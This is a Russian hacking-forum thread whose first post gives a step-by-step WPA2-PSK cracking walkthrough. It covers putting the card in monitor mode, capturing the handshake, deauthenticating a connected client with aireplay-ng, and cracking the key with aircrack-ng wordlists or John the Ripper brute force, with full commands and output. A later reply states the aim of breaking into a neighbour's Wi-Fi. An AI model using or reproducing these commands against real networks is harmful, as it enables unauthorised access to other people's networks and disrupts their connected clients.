Реклама на hackersoft.ru Реклама на hackersoft.ru

Вернуться   Форумы Hackersoft > Хакерство и безопасность > Для новичков > Взлом беспроводной сети
CHAT Регистрация Справка Пользователи Доска почета Календарь Поиск Сообщения за день Все разделы прочитаны

Взлом беспроводной сети Bluetooth, Wi-Fi, спутниковая связь

Ответ
 
Опции темы
Старый 12.12.2012, 01:29   #1
mkrhst
newbie 
 
Регистрация: 12.12.2012
Сообщений: 2
Вес репутации: 0 mkrhst новичек
Депозит: 0$
Вы сказали Спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Этапы взлома :



Переводим интерфейс в "monitor mode"

Находим сети защищенные с помощью WPA2 и Pre Shared Key

Захватываем все пакеты

Деавторизуем клиента, для захвата начального обмена пакетами.

Взламываем ключ используя словари (или с помощью John The Ripper)

Я использовал карточку Dlink DWL-G122 (USB) во время написания данной статьи. В Backtrack4 данное устройство видно под именем wlan0.







Для начала переводим карту в режим "monitor mode" :



[email protected]:~# airmon-ng

Interface Chipset Driver

wifi0 Atheros madwifi-ng

ath0 Atheros madwifi-ng VAP (parent: wifi0)

ath1 Atheros madwifi-ng VAP (parent: wifi0)

wlan0 Ralink 2573 USB rt73usb - [phy0]

[email protected]:~# airmon-ng start wlan0

Interface Chipset Driver

wifi0 Atheros madwifi-ng

ath0 Atheros madwifi-ng VAP (parent: wifi0)

ath1 Atheros madwifi-ng VAP (parent: wifi0)

wlan0 Ralink 2573 USB rt73usb - [phy0]

(monitor mode enabled on mon0)

Сделано, и теперь мы можем использовать карту как mon0



Теперь сканим доступные беспроводные сети, использующие WPA2 / PSK :



[email protected]:~# airodump-ng mon0

CH 6 ][ Elapsed: 4 s ][ 2009-02-21 12:57

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:19:5B:52:AD:F7 -33 5 0 0 10 54 WPA2 CCMP PSK TestNet

BSSID STATION PWR Rate Lost Packets Probe

00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -29 0- 1 12 4 TestNet

Остановите airodump-ng и запустите его заново, записывая все пакеты в файл:



airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2

В данный момент мы имеем два варианта развития событий: либо дем пока клиент совершит подключение и произойдет процедура авторизации, либо деавторизуем подключенного клиента и тем самым заставим его переподключиться. Время - деньги, поэтому давайте проведем небольшой акт насилия. Нам необходимы bssid точки доступа (-a) и mac адрес подключенного клиента (-c)



[email protected]:~# aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0

13:04:19 Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10

13:04:20 Sending 64 directed DeAuth. STMAC: [00:1C:BF:90:5B:A3] [67|66 ACKs]

В результате airodump-ng должен показать “WPA Handshake:” в правом верхнем углу:



CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:19:5B:52:AD:F7 -33 100 1338 99 0 10 54 WPA2 CCMP PSK TestNet

BSSID STATION PWR Rate Lost Packets Probe

00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -27 54-54 0 230

Остановите airodump-ng и убедитесь что все необходимые файлы созданы



[email protected]:/# ls /tmp/wpa2* -al

-rw-r--r-- 1 root root 35189 2009-02-21 13:04 /tmp/wpa2-01.cap

-rw-r--r-- 1 root root 476 2009-02-21 13:04 /tmp/wpa2-01.csv

-rw-r--r-- 1 root root 590 2009-02-21 13:04 /tmp/wpa2-01.kismet.csv

С этого момента вам не нужно быть где то неподалеку от точки доступа. Весь взлом будет происходить оффлайн, поэтому вы можете остановить airodump и другие процессы. В действительности, вы можете запустить процесс взлома и идти спать, гулять и прочее... Взлом WPA2 PSK базируется на брутфорсе, и может занять длительное время. Существует два пути взлома: первый довольно быстрый, но не гарантирует успеха, а второй довольно медленный, но гарантирует что рано или поздно вы найдете ключ.



Первый метод основывается на списках/словарях. Большое количество данных файлов вы можете найти в интернете (например www.theargon.com), или вы можете сгенерировать его самостоятельно используя утилиты, подобные John The Ripper. Как только словарь создан, вы можете запустить aircrack-ng с данным словарем и файлом .cap, который содержитWPA2 Handshake.



aircrack-ng –w /tmp/wordlists/word.lst -b 00:19:5B:52:AD:F7 /tmp/wpa2*.cap



Успешность взлома напрямую зависит от сложности пароля. Другими словами, вам может повезти и вы найдете ключ сразу, или не найдете его совсем.

Следующий метод, брутфорс, будет успешным практически наверняка, но может занять очень длительный срок. Необходимо понимать, что ключ WPA2 может содержать до 64-ех символов. Для начала взлома, если вы хотите использовать John The Ripper для создания всех возможных парольных комбинаций, выполните следующую команду.



[email protected]:~# /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b 00:19:5B:52:AD:F7 -w - /tmp/wpa2*.cap

Последний раз редактировалось Demon, 12.12.2012 в 10:07.
mkrhst вне форума   Ответить с цитированием
Старый 12.12.2012, 22:15   #2
k0t_
advanced 
 
Регистрация: 29.11.2007
Прописка: Днепропетровск
Сообщений: 395
Вес репутации: 9 k0t_ пользовательk0t_ пользователь
Депозит: 0$
Вы сказали Спасибо: 64
Поблагодарили 128 раз(а) в 96 сообщениях
ты хоть бы указывал источник, откуда ты это взял. Тоже еще кульхацкер - даже чужую статью передрать и то нормально не может.
и идея брутфорсить WPA2 - это конечно надо быть особо альтернативно одаренным - причем бесперспективность этого в оригинальной статье отмечено
k0t_ вне форума   Ответить с цитированием
Старый 31.08.2013, 07:24   #3
Silver Soft
newbie 
 
Регистрация: 12.09.2011
Сообщений: 3
Вес репутации: 0 Silver Soft новичек
Депозит: 0$
Вы сказали Спасибо: 1
Поблагодарили 0 раз(а) в 0 сообщениях
Доброе утро! Прошу не кидать камнями, начал изучать линя, поставил себе основной системой на ноут Back Track 5 R3, решил попробовать сломать соседскую вафлю (не нравится мне когда вроде бы он есть, а вроде бы и нет) ,но не совсем понимаю как это сделать, как происходит весь процесс я в принципе понял, но вот как остановить airodump-ng не понимаю( Никакие команды вбить не могу, возможно есть горячие клавиши? Или просто Нужно закрыть консоль и открыть в новом окне, помогите ускорить процесс. Заранее спасибо!!!

добавлено через 22 часа 45 минут
Что то никто не хочет помочь разобраться.....

Последний раз редактировалось Silver Soft, 01.09.2013 в 06:10. Причина: Добавлено сообщение
Silver Soft вне форума   Ответить с цитированием
Старый 02.09.2013, 06:13   #4
Silver Soft
newbie 
 
Регистрация: 12.09.2011
Сообщений: 3
Вес репутации: 0 Silver Soft новичек
Депозит: 0$
Вы сказали Спасибо: 1
Поблагодарили 0 раз(а) в 0 сообщениях
Разобрался сам....CTRL+Z
Silver Soft вне форума   Ответить с цитированием
Ответ


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 
Опции темы

Ваши права в разделе
Вы не можете создавать темы
Вы не можете отвечать на сообщения
Вы не можете прикреплять файлы
Вы не можете редактировать сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.


Часовой пояс GMT +4, время: 02:52.


© 2005 — +∞ Hackersoft. Все и вся защищены.
Публичная оферта | Правила форума | Реклама на сайте
Powered by vBulletin®©™ Jelsoft®©™ Enterprises Ltd. Перевод: zCarot.
Реклама на hackersoft.ru Реклама на hackersoft.ru